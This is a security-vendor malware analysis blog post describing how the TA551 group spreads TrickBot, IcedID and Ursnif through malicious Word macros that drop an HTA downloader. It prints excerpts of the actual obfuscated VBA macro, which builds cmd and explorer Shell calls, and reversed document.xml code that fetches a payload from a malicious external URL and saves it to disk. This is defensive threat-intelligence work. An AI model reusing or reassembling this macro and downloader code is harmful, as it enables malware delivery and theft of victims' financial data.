Continuously Changing Malicious Word Macro Being Distributed – Trend of TA551

The ASEC analysis team has been continuously updating the blog with information on malicious macro files and has been urging users to take caution. This post will introduce a type of word macro file distributed recently by the attack group TA551, showing changes in an average of 1 week.

For the distribution of malware, the group usually sends documents that contain malicious macros using emails. The operation method of the DOC file that downloads additional malware after dropping HTA file upon enabling macro is the same. The key aspect of the change is the types of malware that are additionally downloaded.

Figure 1. Operation method of malicious DOC macro distributed by TA551

The following is an explanation of how the malicious macro in the diagram above works.

The attacker sends an email with attachments that consist of malicious MS Word documents. Once the recipient opens the email, downloads the attached file, and runs the macro, the malicious HTA file gets dropped. A code that exists within the HTA file can download additional malware from the external URL. If the URL link is valid, the ultimate malware that the attacker intended to distribute is downloaded and starts to operate.

Figure 2. Names of DOC files, HTA, and DLL used in distributing TrickBot malware

The names of malicious DOC files used to distribute TrickBot malware this time and of dropped HTA files (same as that of DLL files) are displayed in the table shown above.

The distribution purpose of TrickBot did not change much, and the same can be said for the operation method of the macro code found in the distribution process of altered malicious macro files continuously used by the TA551 group. It used to be IcedId malware that TA551 steadily distributed since last year, however, the end malware to be downloaded is slightly varying, which is a notable change.

Figure 3. Behaviors that are shown when enabling DOC macro (AhnLab RAPIT)

[document.xml] – excerpt

eslaF ,"huDSHMPsgn=hcraes&xt6X4fLT=di&BPHSK=resu&sSW7qpNxMucIcoxFPTJ=jibxO&00oYo19C=hcraes&9vGttM=dic&64BBY6eIrpNf1DyB=XhF&hSlYk=resu?1uzam/NpGbPSg3Ddn55UEAB0gi62SxY3C48ybaZA/sFOKURIghF2uY7XcTM6FrDEGxffw/adda/moc.grebotcotseb//:ptth" ,"TEG" nepO.ptthlmx
2 ,"gpj.neercSnoitpac\atadmargorp\:c" eliFoTevaS.maerts

[Macro Code] – excerpt

Attribute VB_Name = "listboxArray"
Function templateCCurr(removeDocClass)
Debug.Print Shell("" + genericLnkResponse("explorer "))
End Function
Function genericLnkResponse(removeDocClass, Optional dateLibsW = "c:\progra", Optional btnLocal = "ta")
genericLnkResponse = removeDocClass & dateLibsW & "mdata\vbaQueryCount.h" & btnLocal
End Function
Function initTitle(arr As Variant)
Dim out As String
out = ""
For cnt = 1 To UBound(arr)
out = out & Chr(arr(cnt) Xor 100)
initTitle = out
End Function
Attribute VB_Name = "captionO"
Function lnkObject(queryArray)
Shell singleLocal("cmd /c ")
End Function
Function singleLocal(queryArray, Optional listboxLng = "c:\\users\\public\\winSelBefore.h", Optional oOSize = "t", Optional optionDRef = "a")
singleLocal = queryArray & listboxLng & "" & oOSize & optionDRef
End Function
Function indexDocTmp(arr As Variant)
Dim out As String
out = vbNullChar
For cnt = 1 To UBound(arr)
out = out & Chr(arr(cnt) Xor 101)
indexDocTmp = out
End Function

Taking a look into the macro code for each version that shows changes, we can see the pattern of utilizing the internal data of the initially obfuscated document.xml object and creating hta that is obfuscated for the second time. A simple sample shows that it can slightly change the process of combining commands that execute the hta file. In certain types, they may use the data within document.xml that simply reverses the text order as shown above.

Figure 4. Malicious DOC macro file

Figure 5. Part of dropped HTA file after macro is run

Figure 6. Result of unobfuscating part of HTA data

Recently distributed sample shows that when you enable macro in the word file that includes malicious macro as shown in Figure 2, the HTA file from Figure 3 is dropped to the C:\ProgramData path. Unobfuscating a part of the code within the HTA file reveals the following code that downloads additional malware (vbaQueryCount.jpg) from the external malicious URL and saves it in the C:\Users\Public path. The jpg file downloaded is not an image file, but the DLL malware executed with regsvr32.exe.

Figure 7. TrickBot malware downloaded after disguising itself as an image file with jpg extension

Figure 8. Ultimate dll file operated by TrickBot (AhnLab RAPIT)

TrickBot is a malware that is ultimately downloaded, and it attempts malicious behaviors of stealing sensitive information such as that of web browser and financial transaction from the user PC. As shown in Figure 8 (process tree provided by AhnLab RAPIT, malware auto-analysis infrastructure), the malware collects the information of the infected PC using normal processes such as ipconfig.exe, net.exe, nltest.exe, etc.

Recent trend in changes shows that the malware that ultimately runs has changed to financial info-stealing malware.

  • IcedID download type
  • Ursnif download type
  • Trickbot download type

Users should refrain from opening emails from unknown sources, and should not run or enable macro when downloading attachment files. If the security level of the document program is set to low, macro may run automatically without any notification. Therefore, users should maintain the security level high to prevent any unintended features from being run.

Also, users are advised to update the anti-malware engine pattern to its latest version.

AhnLab’s anti-malware product, V3, detects and blocks the types of malicious files introduced in this post (DOC, HTA, DLL, etc.) using the following aliases.

[File Detection]


Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

5 2 votes
Article Rating
Notify of

Inline Feedbacks
View all comments